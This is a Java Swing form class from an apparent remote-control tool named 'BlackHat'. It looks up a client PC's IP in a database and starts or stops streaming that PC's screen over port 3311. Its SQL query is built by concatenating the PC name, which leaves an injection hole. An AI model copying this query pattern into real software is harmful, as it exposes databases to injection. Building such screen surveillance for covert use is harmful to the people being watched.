/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package Window;

import Connection.Command;
import Database.Client;
import Server.Server_Screen;
import java.io.IOException;
import java.sql.SQLException;
import javax.swing.JOptionPane;

/**
 *
 * @author abaza
 */
public class frmScreenRecord extends javax.swing.JInternalFrame {

    private MainGUI MainClass = null;
    private String IP_Address = null;
    private Server_Screen Screen = null;

    /**
     * Creates new form frmScreenRecord
     *
     * @param ClassMain
     * @param PC_Name
     */
    public frmScreenRecord(MainGUI ClassMain, String PC_Name) {
        this.MainClass = ClassMain;
        initComponents();
        jPanel1.setEnabled(false);
        if (Command.KEY_SCREEN_MONITOR) {
            jToggleButton1.setSelected(true);
        } else {
            jToggleButton1.setSelected(false);
        }
        jToggleButton1ActionPerformed(null);

        try {
            String Q = "WHERE " + Client.FLD_PC_NAME + "='" + PC_Name + "'";
            Client Computers = Client.queryFirstRow(blackhat.BlackHat.ConnectDB, Q);
            if (Computers != null) {
                IP_Address = Computers.getPc_ip_address().toString().trim();
            }
        } catch (SQLException ex) {
        }
    }

    /**
     * This method is called from within the constructor to initialize the form.
     * WARNING: Do NOT modify this code. The content of this method is always
     * regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {

        jPanel1 = new javax.swing.JPanel();
        jPanel2 = new javax.swing.JPanel();
        reclad = new eu.hansolo.steelseries.extras.Led();
        jLabel1 = new javax.swing.JLabel();
        jToggleButton1 = new javax.swing.JToggleButton();

        setClosable(true);
        setIconifiable(true);
        setMaximizable(true);
        setResizable(true);
        addHierarchyBoundsListener(new java.awt.event.HierarchyBoundsListener() {
            public void ancestorMoved(java.awt.event.HierarchyEvent evt) {
                formAncestorMoved(evt);
            }
            public void ancestorResized(java.awt.event.HierarchyEvent evt) {
            }
        });

        jPanel1.setBorder(javax.swing.BorderFactory.createEtchedBorder(javax.swing.border.EtchedBorder.RAISED));

        javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
        jPanel1.setLayout(jPanel1Layout);
        jPanel1Layout.setHorizontalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGap(0, 0, Short.MAX_VALUE)
        );
        jPanel1Layout.setVerticalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGap(0, 406, Short.MAX_VALUE)
        );

        jPanel2.setBorder(javax.swing.BorderFactory.createTitledBorder("Control"));

        reclad.setLedOn(false);

        jLabel1.setFont(new java.awt.Font("Noto Sans", 1, 18)); // NOI18N
        jLabel1.setForeground(new java.awt.Color(1, 1, 1));
        jLabel1.setText(blackhat.BlackHat.local.getString("lblRecording"));

        jToggleButton1.setText(blackhat.BlackHat.local.getString("btnStartRecord"));
        jToggleButton1.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                jToggleButton1ActionPerformed(evt);
            }
        });

        javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2);
        jPanel2.setLayout(jPanel2Layout);
        jPanel2Layout.setHorizontalGroup(
            jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel2Layout.createSequentialGroup()
                .addContainerGap()
                .addComponent(reclad, javax.swing.GroupLayout.PREFERRED_SIZE, 46, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jLabel1, javax.swing.GroupLayout.DEFAULT_SIZE, 407, Short.MAX_VALUE)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jToggleButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 138, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addContainerGap())
        );
        jPanel2Layout.setVerticalGroup(
            jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.CENTER)
                .addComponent(jLabel1)
                .addComponent(reclad, javax.swing.GroupLayout.PREFERRED_SIZE, 45, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addComponent(jToggleButton1))
        );

        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
            .addComponent(jPanel2, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(layout.createSequentialGroup()
                .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
        );

        pack();
    }// </editor-fold>//GEN-END:initComponents

    private void reCreatePanel() {
        Command.KEY_SCREEN_MONITOR = false;
        this.MainClass.Screen_Video_Monitor();
    }
    private void jToggleButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jToggleButton1ActionPerformed
        try {
            if (jToggleButton1.isSelected()) {
                if (!Command.KEY_SCREEN_MONITOR) {
                    this.MainClass.Connect(Command.SCREEN_MONITOR);
                    Screen(true);
                    reclad.setLedOn(true);
                    reclad.setLedBlinking(true);
                    jLabel1.setText(blackhat.BlackHat.local.getString("lblRecording"));
                    jToggleButton1.setText(blackhat.BlackHat.local.getString("btnStopRecord"));
                    jPanel1.setEnabled(true);
                } else {
                    ResevedScreen();
                    reclad.setLedOn(true);
                    reclad.setLedBlinking(true);
                    jLabel1.setText(blackhat.BlackHat.local.getString("lblRecording"));
                    jToggleButton1.setText(blackhat.BlackHat.local.getString("btnStopRecord"));
                    jPanel1.setEnabled(true);
                }
            } else if (Command.KEY_SCREEN_MONITOR) {
                if (Screen != null) {
                    this.MainClass.Connect(Command.STOP_SCREEN_MONITOR);
                    Command.KEY_SCREEN_MONITOR = false;
                    Screen(false);
                    reclad.setLedBlinking(false);
                    reclad.setLedOn(false);
                    jLabel1.setText(blackhat.BlackHat.local.getString("lblRecordingStop"));
                    jToggleButton1.setText(blackhat.BlackHat.local.getString("btnStartRecord"));
                    jPanel1.removeAll();
                    jPanel1.updateUI();
                    jPanel1.setEnabled(false);
                    jPanel1 = null;
                    reCreatePanel();
                };
            }
        } catch (IOException ex) {
            RestartScreen();
        }
    }//GEN-LAST:event_jToggleButton1ActionPerformed

    private void formAncestorMoved(java.awt.event.HierarchyEvent evt) {//GEN-FIRST:event_formAncestorMoved
        this.MainClass.desktopPane.updateUI();
    }//GEN-LAST:event_formAncestorMoved

    private void Screen(boolean Switch) throws IOException {
        if (Switch) {
            if (Screen != null) {
                Screen = null;
            }
            Screen = new Server_Screen();
            Screen.init(IP_Address, 3311, blackhat.BlackHat.Args.get("PASSWORD"), jPanel1);
            Screen.StartRecevedScreen(jPanel1);

        } else {
            Screen.StopRecevedScreen();
            Screen = null;
        }
    }

    private void ResevedScreen() {
        if (Screen != null) {
            Screen = new Server_Screen();
            Screen.StartRecevedScreen(jPanel1);
        } else if ((JOptionPane.showConfirmDialog(this, blackhat.BlackHat.local.getString("megCreateNewConnection"), blackhat.BlackHat.local.getString("msgTitelConnection"), JOptionPane.OK_CANCEL_OPTION, JOptionPane.QUESTION_MESSAGE)) == 0) {
            Screen = null;
            RestartScreen();
        } else {
            this.MainClass.Connect(Command.STOP_SCREEN_MONITOR);
            jToggleButton1.setSelected(false);
            jToggleButton1ActionPerformed(null);
        }
    }

    private void RestartScreen() {
        try {
            this.MainClass.Connect(Command.STOP_SCREEN_MONITOR);
            Thread.sleep(1000);
            this.MainClass.Connect(Command.SCREEN_MONITOR);
            Screen(true);
        } catch (InterruptedException ex) {
        } catch (IOException ex) {
            JOptionPane.showMessageDialog(this, ex.getMessage(), "Error", JOptionPane.ERROR_MESSAGE);
        }
    }

    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JLabel jLabel1;
    private javax.swing.JPanel jPanel1;
    private javax.swing.JPanel jPanel2;
    private javax.swing.JToggleButton jToggleButton1;
    private eu.hansolo.steelseries.extras.Led reclad;
    // End of variables declaration//GEN-END:variables
}
